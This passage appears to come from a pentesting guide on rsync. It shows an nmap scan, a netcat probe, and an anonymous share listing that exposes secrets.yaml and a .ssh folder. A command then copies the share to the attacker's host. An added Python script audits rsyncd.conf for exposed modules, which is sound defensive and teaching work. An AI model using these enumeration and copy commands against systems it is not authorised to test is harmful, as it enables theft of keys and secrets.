https://book.hacktricks.xyz/network-services-pentesting/873-pentesting-rsync
Scanning for Rsync
sudo nmap -sV -p 873 127.0.0.1
Probing for Accessible Shares
nc -nv 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
#list
dev Dev Tools
@RSYNCD: EXIT
Enumerating an Open Share
Here we can see a share called dev, and we can enumerate it further.
rsync -av --list-only rsync://127.0.0.1/dev
receiving incremental file list
drwxr-xr-x 48 2022/09/19 09:43:10 .
-rw-r--r-- 0 2022/09/19 09:34:50 build.sh
-rw-r--r-- 0 2022/09/19 09:36:02 secrets.yaml
drwx------ 54 2022/09/19 09:43:10 .ssh
sent 25 bytes received 221 bytes 492.00 bytes/sec
total size is 0 speedup is 0.00
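From here, we could sync all files to our attack host with the command rsync -av rsync://127.0.0.1/dev ./dev (a local destination such as ./dev is required; with only a source argument, rsync just lists the share's contents).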
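The dev share above is listed and readable without credentials, which comes from how the module is defined in the daemon's rsyncd.conf. As an added example (not part of the original page), this Python check flags modules exposed that way; the sample configuration, its paths and the backupsvc user are constructed for illustration.

```python
# Added example: audit rsyncd.conf text for modules exposed like the "dev" share.
# SAMPLE_CONF is constructed for illustration, not taken from a real host.
SAMPLE_CONF = """\
use chroot = yes

[dev]
    path = /srv/dev
    comment = Dev Tools
    read only = no

[backup]
    path = /srv/backup
    auth users = backupsvc
    secrets file = /etc/rsyncd.secrets
    hosts allow = 10.0.0.0/24
    list = no
"""

FALSE = {"no", "false", "0"}  # rsyncd.conf boolean spellings for "off"

def parse_modules(text):
    """Return {module: params}; globals seen so far are inherited by each module."""
    globals_, modules, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            name = line[1:-1].strip()
            # [global] starts another global section rather than a module
            current = None if name == "global" else modules.setdefault(name, dict(globals_))
        elif "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            (globals_ if current is None else current)[" ".join(key.lower().split())] = value
    return modules

def audit(text):
    """Return {module: [findings]} for modules reachable without credentials or limits."""
    checks = [
        ("anonymous: no 'auth users'", lambda p: not p.get("auth users")),
        ("unrestricted: no 'hosts allow'", lambda p: not p.get("hosts allow")),
        ("listable: shown in module listing", lambda p: p.get("list", "yes").lower() not in FALSE),
        ("writable: 'read only' disabled", lambda p: p.get("read only", "yes").lower() in FALSE),
    ]
    found = {n: [label for label, test in checks if test(p)] for n, p in parse_modules(text).items()}
    return {n: hits for n, hits in found.items() if hits}

if __name__ == "__main__":
    print(audit(SAMPLE_CONF))
```

The check relies on rsync's defaults: a module is listable and read-only unless the configuration says otherwise, so a missing `list` line still counts as listable.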